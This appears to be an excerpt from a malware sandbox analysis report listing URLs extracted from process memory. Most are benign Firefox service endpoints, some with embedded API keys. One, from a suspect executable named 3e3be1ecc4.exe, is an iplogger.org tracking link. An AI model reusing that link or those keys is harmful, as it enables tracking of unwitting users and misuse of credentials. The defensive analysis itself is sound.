Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF9A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B44B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8626000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF95A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabhttps://www.mozilla.org/privacy/fir
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF9A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/ActivityStreamMe
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morechrome://global/skin/icons/pocket.svg
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF9A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsAllows
Source: firefox.exe, 0000001F.00000002.2898358216.00000294A9503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001F.00000002.2895107226.00000294A924C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001F.00000003.2762399051.00000294ABF77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B41DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B41DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3005210447.00002A858BA04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001F.00000002.2986949900.00000294B4375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/eudict
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2891102981.00000294A7DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitimprovesearch.topSiteSearchShortcuts.havePinnedFetches
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: 3e3be1ecc4.exe, 0000000D.00000003.3089794015.00000000056E1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089137215.00000000056E1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089580514.00000000057E4000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089961205.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3090206271.00000000056E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1Pz8p7
Source: firefox.exe, 0000001F.00000002.2986949900.00000294B4375000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2844134582.00000294ADE66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001F.00000002.2903676258.00000294ABDA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2923306318.00000294ACFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2843152872.00000294ACFF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2923306318.00000294ACF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001F.00000002.2969171257.00000294AF67B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002002577.00000C581CF11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001F.00000002.2969171257.00000294AF67B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964723813.00000294AEC5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comextensions.update.requireBuiltInCertsdfbd59db-d7d5-4efe-b379-5c3af4
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A92D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892123688.00000294A827D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892123688.00000294A827D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001F.00000002.2884773158.000002949C4D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892123688.00000294A827D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/Web
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001F.00000002.2986949900.00000294B43CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B446D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B44B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/webcom
Source: firefox.exe, 0000001F.00000002.2986949900.00000294B43CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2976050815.00000294B0083000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B44B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
